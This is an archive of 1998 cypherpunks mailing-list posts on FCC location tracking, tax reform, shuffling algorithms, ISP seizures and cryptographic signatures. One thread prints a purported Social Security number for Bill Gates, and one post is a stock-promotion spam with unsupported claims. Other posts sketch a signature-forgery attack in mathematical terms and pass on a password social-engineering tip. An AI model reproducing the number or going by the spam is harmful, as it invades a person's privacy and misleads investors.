(1)  FCC PROPOSES LOCATION TRACKING FOR WIRELESS PHONES

Rejecting privacy arguments, the Federal Communications Commission on
October 22 proposed turning wireless phones into location tracking devices.

Ruling under the Communications Assistance for Law Enforcement Act of 1994
(CALEA), the Commission proposed requiring cellular and other wireless phone
companies to track the location of their customers, identifying the cell
site at the beginning and end of every call. This decision, if finalized,
would allow the FBI to get out of the privacy deal it struck in 1994 when
CALEA was adopted.  At the time, the FBI said that location information was
not required by CALEA, and the Congressional intent is 100% clear on the
point.

For background on CALEA and the FCC's proceeding, see CDT's digital
telephony page: http://www.cdt.org/digi_tele/

_____________________________________________________________________________

(2)  PUBLIC COMMENT SOUGHT - A CHANCE TO TELL THE FCC THAT CELL PHONE
TRACKING IS NOT ACCEPTABLE!

The FCC decision on cell phone tracking is only a tentative decision, known
as a Notice of Proposed Rulemaking.  The Commission is seeking public
comment on its proposal.  The public comment period has not been set, but
could be between 30 and 60 days.  Until now, the discussion on this issue
has been held by policy-makers in Washington, but this decision will affect
the entire nation. Since this will likely be the only chance for those
outside the beltway to weigh in with a comment, CDT urges citizens to let
their voice be heard.

CDT has established a special "Action" page to make it easy for citizens to
contact the FCC and file comments opposing the location tracking proposal:
http://www.cdt.org/action/filing.html

_____________________________________________________________________________

(3)  FCC LAUNCHES INQUIRY INTO WIRETAPPING IN PACKET NETWORKS

On a separate issue in the same CALEA proceeding, the Commission agreed
with CDT and other privacy advocates. The FCC said that industry's initial
plan for conducting surveillance in so-called "packet" networks was
insufficient, and the Commission asked for further technical and legal
comment.  Packet networks break communications up into many small packets,
each one consisting of a segment of content with addressing information
attached to rout it to its intended destination.  Under the industry's
proposal, carriers could have provided to the government a person's entire
packet stream, including both routing information and content, even when
the government did not have the authority to intercept the content of the
communications.  CDT argued that the carriers should be required to
separate addressing information from the content of communications and only
give the government what it was authorized to intercept.

The Commission decided that it needed to launch a technical inquiry. This
could determine the future of surveillance. The question is whether
carriers have an obligation to protect the privacy of communications the
government is not authorized to intercept.

For CDT's discussion of the packet issue, see:
http://www.cdt.org/digi_tele/980426_fcc_calea.html#ivc
_____________________________________________________________________________

(4)  OTHER SURVEILLANCE FEATURES PROPOSED

On other items sought by the FBI, the Commission tentatively decided that
carriers should be required to continue tapping parties on a conference
call after the subject of the court order has dropped off the call, and to
extract dialed number information from the content stream and provide it to
the government under a minimal standard.  In all, the Commission
tentatively accepted five out of nine new surveillance capabilities sought
by the FBI.

As of today, only a sumamry of the Commission's decision, not the full
NPRM, was not publicly available.  CDT will make the full text of the NPRM
available on-line as soon as it becomes public.

____________________________________________________________________________
____
(5) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
Internet users, industry leaders, policymakers and activists, and have
become the leading source for information about critical free speech and
privacy issues affecting the Internet and other interactive communications
media.

To subscribe to CDT's Policy Post list, send mail to

majordomo@cdt.org

In the BODY of the message (leave the SUBJECT LINE BLANK), type

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the above
address with NOTHING IN THE SUBJECT LINE AND a BODY TEXT of:

    unsubscribe policy-posts
____________________________________________________________________________
____
(6) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       http://www.cdt.org/


Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

----------------------------------------------------------------------------
End Policy Post 4.27                                             10/28/98
----------------------------------------------------------------------------

------------------------------------
Ari Schwartz
Policy Analyst
Center for Democracy and Technology
1634 Eye Street NW, Suite 1100
Washington, DC 20006
202 637 9800
fax 202 637 0968
ari@cdt.org
http://www.cdt.org
------------------------------------





****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 30 Oct 1998 17:36:51 +0800
To: cypherpunks@cyberpass.net
Subject: IP: One Million Sign Petition to Kill IRS Code
Message-ID: <199810300903.BAA19570@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: One Million Sign Petition to Kill IRS Code
Date: Thu, 29 Oct 1998 19:47:24 -0600
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/1028-112.txt

NFIB: One Million Sign Petition to Kill IRS Code       
U.S. Newswire
28 Oct 12:00

 NFIB: Petition to Kill IRS Code Hits Million Signature Mark
 To: National Desk
 Contact: Jim Weidman of the National Federation of Independent
          Business, 202-554-9000

   SAN DIEGO, Calif., Oct. 28 /U.S. Newswire/ -- The National
Federation of Independent Business (NFIB) today reached a milestone
in its drive to abolish the federal tax code and replace it
with a simpler and fairer system.

   At a downtown rally here today, NFIB President Jack Faris
announced that the national petition drive calling on Congress to
sunset the current IRS code had collected its one-millionth
signature.  Onlookers cheered as Faris placed the landmark signature
atop an 18-wheeler stacked with scores of boxes bearing signed
petitions collected during the group's year-long campaign.  Labeling
the petition drive "the most ambitious tax reform initiative since
the Boston Tea Party," Faris expressed thanks to the more than 30,000
small-business owners who served as "volunteer captains, collecting
signatures on Main Streets throughout the country in this
unprecedented grassroots effort to restore reason to our tax system."

   The nation's leading small-business advocacy group, NFIB
has 600,000 members nationwide.  "We now have 1 million reasons
for Congress and the president to do what's right for small
business, and what's right for America," Faris said to a crowd
of hundreds who gathered in front of an IRS office building
for the tax reform event.  "These first 1 million petitions
will serve as the symbol as well as the fuel that keeps this
effort to abolish the code going strong.  We won't give up!"
Faris also added that "NFIB will continue to gather petitions
and grassroots support, because Washington sees the light when
they feel the heat from Main Street."

   Faris outlined his group's plan for action in the 106th Congress:
"NFIB will continue to stand up for small business on this issue and
others.  We will be a catalyst, urging Congress to sunset the IRS
code as the first step toward responsible tax reform, so that the new
century may begin under transition to a new tax system." Noting that
the nation's economy is strong, and economic optimism is high, Faris
said, "This is the right time for Congress and the president to
answer the call from grassroots America and replace our broken tax
code.  To ignore that call -- at a time when we are able to answer
it -- would be irresponsible.  One million signatures can't
be ignored."

   The San Diego rally was the latest event in NFIB's ongoing
"Campaign for Responsible Tax Reform," which was kicked off
one year ago in Independence, Mo.  Today's event was simulcast
live on the Roger Hedgecock Show on KSDO-AM (1130) and KOGO-AM
(600).

   -----
   For a copy of NFIB's Seven Steps to Responsible Tax Reform,
or any other materials related to the campaign, visit
NFIB's special Web site at www.not4IRS.org.

 -0-
 /U.S. Newswire  202-347-2770/
 10/28 12:00

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Fri, 30 Oct 1998 14:56:19 +0800
To: Information Security <guy@panix.com>
Subject: Re: William H. Gates III
In-Reply-To: <199810300528.AAA20342@panix7.panix.com>
Message-ID: <3.0.3.32.19981030011656.03b03cb0@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



531-539 ...Washington
according to http://www.ssa.gov/foia/stateweb.html

BTW - When you look at http://www.ssa.gov/foia/oct98hg.htm
The last two digit group issued for 539 is "39".  And according to
http://www.ssa.gov/foia/ssnweb.html the numbers are not issued in sequence,
but according to an strange method.  The early odds, then the evens, then
the rest of the odd number groups.  Just in case anyone wants to understand
how to detect bogus numbers.

At 12:28 AM 10/30/98 -0500, Information Security wrote:
>Leading digits "539"...what state was he born in?
>---guy
>
>======================================================================
>SCAN THIS NEWS
>10/29/98
...
>        William H. Gates III      Social Security #: 539-60-5125

  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>nicolo@mach.eli
Date: Fri, 30 Oct 1998 13:46:47 +0800
To: cypherpunks@Algebra.COM
Subject: Re: cohen predicts army patrols US streets
Message-ID: <199810300514.GAA01398@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




>"Terrorism is escalating to the point that Americans soon
>may have to choose between civil liberties and more
>intrusive means of protection," says Defense Secretary
>William S. Cohen

This is the classic intro into a dictatorhip and militarisation
of a society. I wonder if someone can dig up Hitler's speeches
on the subject.

>"It could happen here," Cohen said he conclued after 8
>months of studying threats under the Pentagon microscope.

Sure. I bet this has nothing to do with the surge of false
"bomb threats" in Austin and SIlicon Valley high-tech companies
or flooding mass media with descriptions of dangers from domestic
terrorism.

Public must be aware of the "presence" of undesirables first.

Who is it going to be this time, after cpunks are dealt with ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 30 Oct 1998 21:04:19 +0800
To: cypherpunks@toad.com
Subject: Bic-Assassins Convicted
Message-ID: <199810301210.HAA10534@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



CNN

http://www.cnn.com/US/9810/30/weapons.case.ap/

Two men convicted in biological weapons case

October 30, 1998

Web posted at: 3:10 a.m. EST (0810 GMT) 

BROWNSVILLE, Texas (AP) -- Two men accused of scheming to 
attack President Clinton and others with cigarette lighters 
equipped with poison-coated cactus needles were convicted 
of sending threatening e-mail. 

Johnie Wise, 72, and Jack Abbott Grebe, 43, were convicted 
Thursday of two counts of sending threatening e-mails -- one 
message to the Internal Revenue Service and one to the Drug 
Enforcement Agency. 

Grebe and Wise were acquitted on one count each of conspiracy 
to use weapons of mass destruction count and five counts each 
of sending threatening messages -- to President Clinton, U.S. 
Customs, the FBI, the Bureau of Alcohol Tobacco and Firearms, 
and the Secret Service. 

They could get life in prison at their Jan. 29 sentencing. 

Prosecutors said Wise schemed to modify a cigarette lighter 
so it would shoot cactus needles coated with toxins such as 
rabies, botulism, anthrax or HIV. 

Defense attorneys called idea 'silly'

Among the men's alleged targets: Clinton, the U.S. and Texas 
attorneys general, and FBI Director Louis Freeh. 

Defense attorneys called the idea "silly" and "cockamamie." 
There was never any evidence that the accused possessed 
biological weapons or tried to develop a deadly lighter. The 
e-mailed threats were vaguely worded and did not discuss the 
lighter or cactus thorns. 

Under federal law, however, the threats were enough for a 
conviction and no biological weapons were needed, prosecutors 
said. 

The men would have carried out their plan to hurt government 
employees and their families if they hadn't been arrested, 
Assistant U.S. Attorney Mervyn Mosbacker said. 

Wise and Grebe were accused of concocting the plan to threaten 
government officials with e-mails. One e-mail, sent June 12, 
was titled "Declaration of War" and a second one, sent June 26, 
said government workers had been "targeted for destruction by 
revenge." 

A third defendant, Oliver Dean Emigh, 63, was acquitted on all 
counts. He was accused of writing the June 12 message, but the 
charges against the men stemmed from the June 26 e-mail.

--

Thanks to D.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: insight@sprynet.com
Date: Sat, 31 Oct 1998 00:33:20 +0800
To: <cypherpunks@cyberpass.net>
Subject: No Subject
Message-ID: <199810301545.HAA28403@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



Oct.30th,1998

                       
Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for!







  
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 31 Oct 1998 01:41:33 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Random array (fwd)
Message-ID: <3639EF00.5B20F3A0@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



I said:
>> One could modify Greg's suggestion slightly by attaching an auxiliary
>> array of 256 random numbers to each of the members of the original
>> array and then using the most efficient handy sort algorithm to sort
>> those random numbers, dragging along their associated original array
>> elements.  This way it doesn't have a chance to interfere with the
>> operation of the sorting algorithm, at the cost of an extra array.

Jim Choate responded:
> If I understand the process. Each array would cycle through in parallel
> sorting 2 elements of each array. Once that was finished we'd then sort the
> arrays themselves according to some process. From your description it seems
> to imply that you're going to sort the 1st element descending at that point.
> This in effect mis-orders each array after every sort.
>
> This sort of system is an IFS and could lead to determinism (ie a cycle of
> sort patterns that repeat endlessly) or chaos (ie a pattern that doesn't
> repeat). It in and of itself doesn't guarantee any randomness merely a
> continously munged sort.

I expressed myself badly.  Steve Gibbons posted a message
to Coderpunks expressing more clearly what I had in mind:
Fill up the high bits of your N words with random numbers and
the low bits with an index from 0 to N-1.  Sort the array, then
mask off the high bits.  If the random numbers were unique, you
are left with a randomly shuffled array.
-- 
	Jim Gillogly
	Trewesday, 9 Blotmath S.R. 1998, 16:48
	12.19.5.11.12, 10 Eb 5 Zac, Seventh Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Elliott <melliott@ncsa.uiuc.edu>
Date: Sat, 31 Oct 1998 00:49:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: William H. Gates III
In-Reply-To: <199810300528.AAA20342@panix7.panix.com>
Message-ID: <v0410270ab25f93baffab@[141.142.103.240]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:28 AM -0500 10/30/98, Information Security wrote:
>Leading digits "539"...what state was he born in?
>


And just to clear up some silly misconception people have.  SSN numbers are 
not indicative of where someone was born.  Only where they applied for a 
SSN number.


Matt <mailto:melliott@itmail.ncsa.uiuc.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 30 Oct 1998 19:22:55 +0800
To: jamesd@echeque.com
Subject: discrete log attack on 1st use of Kong signature? (Re: Using a password as a private key.)
In-Reply-To: <199810291821.TAA03804@replay.com>
Message-ID: <199810301010.KAA04282@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:
> Bill Stewart writes:
> > Kong takes an interesting approach to key certification and signatures -
> > it doesn't use the "True Name" model with a Certificate Authority Trusted
> > Third Party Subject To Many Government Regulations certifying that the
> > person who has this key has that True Name.  Instead, you sign messages,
> > and it keeps a database of signed messages from peop le, and you can
> > compare a message you have with a message you've received previously to
> > see if it's signed by the same key, and you can send encrypted messages
> > to the person who sent you a previous message.
> 
> What happens if you create another key which signs an existing message,
> as was illustrated here recently in the case of Toto's key.  Can you
> convince Kong that you are the same person who sent the earlier message?

Depends if the discrete log attack anonymous used works over elliptic
curves, or if an analogous attack can be mounted on the elliptic curve
signature scheme James is using.

Anonymous wrote on his attack:

: N is the product of two primes, but each p-1 has about 16 small
: prime factors (about 25-35 bits) to allow calculating the discrete
: log efficiently.  With this choice of primes it took about three
: hours to run the discrete log.

in otherwords n is 1024 bit, p and q 512 bit, p1..p16, q1..q16 are
about 25-35 bits each:

	n = p x q
	p-1 = p1 x p2 x .... x p16
	q-1 = q1 x q2 x .... x q16

then he can take discrete logs modulo n.  With this given signature s
on message m with unpublished public key, he can compute a public and
private exponent e, d which could have signed message m:

	s = m ^ d mod n
and	m = s ^ e mod n

so compute discrete log of m mod n in base s to compute an e.  Then
compute a d using the normal: 

	e.d = 1 mod (p-1)(q-1)

If something like this worked on Kong's signatures, you would need two
signatures, or a signature on a message together with a signed public
key.  Does Kong use self signed public keys?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yardena Arar + Christian Goetze <kitties@best.com>
Date: Sat, 31 Oct 1998 02:55:20 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Random array (fwd)
In-Reply-To: <199810301748.LAA25557@einstein.ssz.com>
Message-ID: <Pine.BSF.4.05.9810300950020.17124-100000@shell5.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



And what's so bad about doing this:

for (i=0; i < n-1; i++) {
  swap_positions(array, i, i+rand(n-i));
}

which populates the array by randomly choosing the next element?

It all comes down to knowing how good "rand()" is, anyway...


On Fri, 30 Oct 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Fri, 30 Oct 1998 08:53:20 -0800
> > From: Jim Gillogly <jim@acm.org>
> > Subject: Re: Random array (fwd)
> 
> > Jim Choate responded:
> > > If I understand the process. Each array would cycle through in parallel
> > > sorting 2 elements of each array. Once that was finished we'd then sort the
> > > arrays themselves according to some process. From your description it seems
> > > to imply that you're going to sort the 1st element descending at that point.
> > > This in effect mis-orders each array after every sort.
> > >
> > > This sort of system is an IFS and could lead to determinism (ie a cycle of
> > > sort patterns that repeat endlessly) or chaos (ie a pattern that doesn't
> > > repeat). It in and of itself doesn't guarantee any randomness merely a
> > > continously munged sort.
> > 
> > I expressed myself badly.  Steve Gibbons posted a message
> > to Coderpunks expressing more clearly what I had in mind:
> > Fill up the high bits of your N words with random numbers and
> > the low bits with an index from 0 to N-1.  Sort the array, then
> > mask off the high bits.  If the random numbers were unique, you
> > are left with a randomly shuffled array.
> 
> Ah, ok I think I have it.....
> 
>  So we start out with N words (2 bytes):
> 
>    0  1  2  ...  n-2 n-1 n
>    *  *  *       *   *   *
> 
>    ^
>  15...8 7...0
>    rng   ind
> 
> So the ordering of bits 8-15 moves the originaly ordered indexes to
> positions correlated to relative magnitude of the rng part.
> 
> That certainly looks like it'd work.
> 
> Thanks for the clarification.
> 
> 
>     ____________________________________________________________________
>  
>        To know what is right and not to do it is the worst cowardice.
> 
>                                                      Confucius
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 31 Oct 1998 03:57:15 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Random array (fwd)
Message-ID: <363A10F2.D5AABA72@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



> And what's so bad about doing this:
> 
> for (i=0; i < n-1; i++) {
>   swap_positions(array, i, i+rand(n-i));
> }
>
> which populates the array by randomly choosing the next element?

That one's fine, and is equivalent to Knuth's Algorithm P, except
that it does two more additions per iteration.

-- 
	Jim Gillogly
	Trewesday, 9 Blotmath S.R. 1998, 19:16
	12.19.5.11.12, 10 Eb 5 Zac, Seventh Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 31 Oct 1998 02:10:47 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Random array (fwd)
Message-ID: <199810301748.LAA25557@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 30 Oct 1998 08:53:20 -0800
> From: Jim Gillogly <jim@acm.org>
> Subject: Re: Random array (fwd)

> Jim Choate responded:
> > If I understand the process. Each array would cycle through in parallel
> > sorting 2 elements of each array. Once that was finished we'd then sort the
> > arrays themselves according to some process. From your description it seems
> > to imply that you're going to sort the 1st element descending at that point.
> > This in effect mis-orders each array after every sort.
> >
> > This sort of system is an IFS and could lead to determinism (ie a cycle of
> > sort patterns that repeat endlessly) or chaos (ie a pattern that doesn't
> > repeat). It in and of itself doesn't guarantee any randomness merely a
> > continously munged sort.
> 
> I expressed myself badly.  Steve Gibbons posted a message
> to Coderpunks expressing more clearly what I had in mind:
> Fill up the high bits of your N words with random numbers and
> the low bits with an index from 0 to N-1.  Sort the array, then
> mask off the high bits.  If the random numbers were unique, you
> are left with a randomly shuffled array.

Ah, ok I think I have it.....

 So we start out with N words (2 bytes):

   0  1  2  ...  n-2 n-1 n
   *  *  *       *   *   *

   ^
 15...8 7...0
   rng   ind

So the ordering of bits 8-15 moves the originaly ordered indexes to
positions correlated to relative magnitude of the rng part.

That certainly looks like it'd work.

Thanks for the clarification.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Fri, 30 Oct 1998 21:13:46 +0800
To: redrook@yahoo.com
Subject: Coersion Re: don't use passwords as private keys (was Re: Using a password as a private key.)
Message-ID: <802566AD.00420227.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>From information given by a security consultant teaching a course I
attended :

The easiest way to get a password from someone is to ask them.  Many people
will tell you if you look official, friendly etc

Torture is less likely to work as people don't like to have to do
something.  They are often willing to "volenteer" information as long as
they still appear to be in control.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 31 Oct 1998 03:52:41 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: FW: rules of engagement (fwd)
In-Reply-To: <199810220438.XAA06083@einstein.ssz.com>
Message-ID: <v04011701b25faf3626c4@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



I'm still about 8 days behind, so excuse the question:


At 11:38 PM -0500 10/21/98, Jim Choate wrote:
>Forwarded message:
>> From: Carlos Macedo Gomes <gomes@www.navigo.com>>
>> discussing at that meeting with members of EF Texas.  BTW: Whatever
>> happended to the Classified Ad project??
>It was going along fine until I made the mistake of asking when....
>I'd offered a couple of dates, nobody ever commented on them.

>I can still cover Austin, Dallas, Houston, San Antonio, Fort Worth, El Paso.
>A single paper in each city.
>
>I'd say do it like Thanksgiving Day or Christmas. I need 1 months warning.
>
>It might be kind of cool to put regular ads in with various comments like the
>1st Amendment, or questions regarding civil liberties, famous quotes, etc.
>Just sign it,

	I am not sure, but is this an idea to put the 3 line RSA Perl
implementation in the classified adds? (as near as I could gather trying to
read ahead) If not, what is it?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 31 Oct 1998 04:10:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: The Economic Cause of Privacy
In-Reply-To: <199810221225.OAA21798@replay.com>
Message-ID: <v04011702b25fb4bf73a5@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:25 AM -0500 10/22/98, Anonymous wrote:
>>Remember, the reason we have no financial privacy these days is because we
>>have book-entry settlement, which relies on biometric identity, known
>>physical
>>location, and the force of a nation state as the ultimate "error-handler" to
>>prevent repudiation in the transaction protocol.
>Yes, and cars break down because there are service shops.
>Utter nonsense.
>There is no financial privacy because because those who would like such thing
>have less power (hired guns) than those who would not like it. And those with
>controlling interests in modern societies do not like it because control would
>be lost, and population harvesting (aka taxing) would have to be radically
>changed, and that is expensive. The system is self-supporting.
>
>Idea that somehow smart algorithms will bring financial privacy is a good
>starting
>point for cryptoaddict's wet dream, but in reality has the same chance of
>success as survival rate of armed citizens against the government. Zero.

	Afghanistan
	The french Revolution
	The "Revolutionary War"
	Several Countries in Eastern Europe.
>
>Use of government-controlled, issued and supervised payment
>methods/instruments
>is in place because it is proscribed, not because "money/checks, etc. exist".
                           ^^^^^^^^^^
	Prescribed. Proscribed means outlawed.

>Therefore constructing computer-assisted anon payment schemes "because it is
>cheaper that way" is pointless. Money is not there to make your life easier.
>Money exists so that you can be taxed and conditioned to desired behaviour at
>minimal cost.

	Money exists because it is easier to carry paper and coins than to
carry chickens. Taxes can occur without money.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 31 Oct 1998 03:52:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Shuffling (fwd)
Message-ID: <199810301934.NAA26157@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: iang@cs.berkeley.edu (Ian Goldberg)
> Subject: Re: Shuffling (fwd)
> Date: 30 Oct 1998 18:46:44 GMT

> >> o The resulting deck is then achieved by having cards fall from one or the
> >>     other of the two parts; a card will fall from one of the parts with
> >>     probability proportional to the number of cards remaining in the part.

> >It also doesn't address the problem of 'clumping' where a group of cards (ie
> >royal flush) stay together through the shuffling. This is the reason that
> >real dealers try for a 1-for-1 shuffle each time.
> 
> It actually _does_ address the normal, statistical clumping that goes on.
> It _doesn't_ address clumping that occurs because, say, you were playing
> poker while eating a peanut butter sandwich. :-)

What I was refering to was that let's say we've just finished playing a hand
of cards and the next dealer collects them from each player and stacks them
up prior to shuffling. Since the selection of cards is related to the
thickness of the two half-decks (and not a strict 1-to-1) it is reasonable
to expect an above average number of such shuffles (ones with grossly uneven
card counts, exactly what that would be I don't know), now as a player I'm
going to know about this bias and can use it to my advantage. I admit it
probably won't change the odds much but sometimes a few hundreths over a
long time can make a difference.

It seems to me the next question that needs asking is:

Given the probability model we've discussed what does the difference in
odds relating to clumping show in relation to uneven deck splitting. If
the deck is split even (26:26) v 27:25 v 28:24 v etc.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 31 Oct 1998 04:12:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: FW: rules of engagement (fwd)
Message-ID: <199810301955.NAA26318@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 30 Oct 1998 13:06:53 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: FW: rules of engagement (fwd)

> I'm still about 8 days behind, so excuse the question:

No. (;)

> >> discussing at that meeting with members of EF Texas.  BTW: Whatever
> >> happended to the Classified Ad project??

> >I can still cover Austin, Dallas, Houston, San Antonio, Fort Worth, El Paso=

> 	I am not sure, but is this an idea to put the 3 line RSA Perl
> implementation in the classified adds? (as near as I could gather trying to
> read ahead) If not, what is it?

That is correct, it is the 3-line RSA proposal.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Sat, 31 Oct 1998 06:57:10 +0800
To: cypherpunks@cyberpass.net
Subject: Orwell
Message-ID: <e13486ebc447582125bd572fae7fccfd@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Some US ISP's were seized in a cyberporn bust.

Dreamscape's statement at:

http://www.dreamscape.com/dream98/statement.htm

Buffnet's at:

http://www.buffnet.com/ag/

Vacco's at:

http://www.oag.state.ny.us/press/oct98/oct28_98.html

All three worth reading. This could be a big story. The theory against
the ISPs (not that they've been charged with a crime) is that they
knowingly carried the newsgroups:

alt.binaries.pictures.erotica.pre-teen
alt.binaries.pictures.erotica.early-teen

This has broader application -- alt.binaries.warez.*,
alt.binaries.sounds.mp3, etc.

Is any ISP which carries suspect newsgroups at risk of having 
its equiptment seized, and who draws up the blacklist of 
newsgroups?

Or worse, is there no public blacklist at all -- just the
